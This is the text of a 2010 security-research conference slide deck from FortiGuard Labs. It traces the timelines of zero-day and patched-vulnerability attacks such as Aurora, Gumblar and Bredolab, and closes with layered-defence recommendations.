Beyond Aurora s Veil: A Vulnerable Tale Derek Manky Cyber Security & Threat Research FortiGuard Labs October 26th, 2010: SecTor 2010 Toronto, CA
Conficker: April Doomsday.. Meanwhile JBIG2 Zero Day PDF/SWF January 2009: Malicious PDF Samples In the Wild Drop Gh0st RAT Trojan, Exploits CVE 2009 0658 No Click Variant through Windows Shell Extensions February 02, 2009: Adobe Acknowledges via APSA09 01 March 10, 2009: Adobe Patches via APSB09 03 2 Attacks Occurred Roughly 63 Days Before Patch
... A Vulnerable Tale Gh0st RAT Advertisement Photo 3
Bredolab & Gumblar Meanwhile Gumblar & Bredolab Botnets Sync Through PDF Exploits 4 March 18, 2009 Adobe Issues Patch APSB09 04 Includes CVE 2009 0927, PDF Exploit March 23, 2009: Gumblar attack surfaces Compromised websites with exploits Freshly exploiting CVE 2009 0927 Drops Bredolab Botnet (First appearance) Downloads FTP Stealing Module for Gumblar Downloads FakeAV for Profit Aggressively Attacked 5 Days After POC Released
Bredolab & Gumblar 5
Bredolab & Gumblar Then and Now Gumblar & Bredolab Botnets Sync Through PDF Exploits Bredolab Oct 2009: New Protocol (v2), Custom Encrypted HTTP Jan 2010: Uses Pushdo Botnet New Webmailing Engine Distributed (Webwail)[1] Cracks CAPTCHAs in < 30 seconds Feb 2010: Downloads Ransomware Force Kills Applications, Demands > $50 USD Oct 2010: Distributes Grum/Tedroo Botnet Source Code Available Bredolab now used for various operators & attacks since original incarnation [1] FortiGuard Labs Discovers Webwail in December 2009 6
Bredolab & Gumblar Then and Now Gumblar & Bredolab Botnets Sync Through PDF Exploits Gumblar Today[1] 9,350 infected links 951 links hosting exploits 165 malware variants served Popular exploited vulns: CVE 2007 0701 CVE 2008 0655 CVE 2008 2992 CVE 2009 0927 [1] FortiGuard Web Scanning Systems, Oct 19 th 2010 7
... A Vulnerable Tale In The Threat Spotlight Internet Explorer HTML Memory Corruption ( Aurora ) 8 September 30, 2009: Microsoft Receives Vulnerability Report (Later CVE 2010 0249) December 15, 2009: Google Later Acknowledges Attack Discovery January 04, 2010: C&C Servers Taken Down January 12, 2010: Attacks Publicly Acknowledged Dropped Custom Trojan January 14, 2010: Public POC Exploit Code Available January 21, 2010: Microsoft Patches via MS10 002 Zero Day 113 Days Before Patch, 7 Days From Public POC
... A Vulnerable Tale Meanwhile Internet Explorer Use After Free 9 March 09, 2010: Microsoft Acknowledges via Advisory / CVE 2010 0806 Web Drive By Attacks Already In the Wild Drop Gh0st RAT Trojan, Similar to Aurora March 30, 2010: Microsoft Patches via MS10 018 Attacks Occurred Roughly 21 Days Before Patch FortiGuard Detects Highest Exploit Rate Before Patch (Zero Day)
Internet Explorer Use-After-Free
Exploit Demonstration Fortinet Confidential 11
The Next Chapter What can we learn?!!! Headlines are not everything!!! Reactive defense against high profiles attack == inefficient Threats often share similar attack techniques Browsers, Document Formats, System Services Conficker Neeris (RPC DCOM), Murofet (DGA) Gh0st RAT (PDF JBIG2) Gumblar (PDF geticon) Aurora Google/etc & Gh0st RAT: IE Use After Free 12
The Next Chapter What can we learn? 13 Zero day attacks happen more often than you may think Attacks can continue for months undetected Can be 1 3 week response time for patches Once detected / reported.. Otherwise 6 12 months Patched vulnerabilities are attacked quickly, and frequently Conficker: 30 Days Gumblar: 5 Days Patch management! Quick patching is essential Does not work on zero day attacks
The Next Chapter The new decade of threats Attacks can survive for years Attacks change extremely frequently Server side polymorphism Repack hosted malware Repack hosted scripts [Gumblar] Crimeware and source code Copy & paste bots New versions Endless domains Creates tremendous volume 14
FortiGuard Labs Security Research 87 Zero-Days Discovered Since 2008, Mostly Critical Oct 2010: 30+ Outstanding in Zero-Day State 15 http://www.fortiguard.com/advisory/upcomingadvisory.html
Fighting Back Strategic Defense Standard security rules apply; often ignored Layered security vs. Growing attack surface Applicable to Infection & Post Infection Education and Training (RSS) Think before you link Use of JS, Flash (Noscript, PDF Reader) Trust management (PGP, SSL) Alternative software considerations OS, Browsers, Doc Readers, Sandboxes Access level lock down (Admin privileges) 16
Fighting Back Layered Security vs. Growing Attack Surface Intrusion Prevention: Botnet C&C, Zero Days & Exploits Application Control: Malicious services Compromised Facebook Applications Webfiltering: Botnet C&C, Fast Flux / MalHosting, SEO Antispam: Spambots & Incoming Campaigns Antivirus: Trojans, bots, ransomware, etc Vulnerability Review Software used vs. alternatives 17
18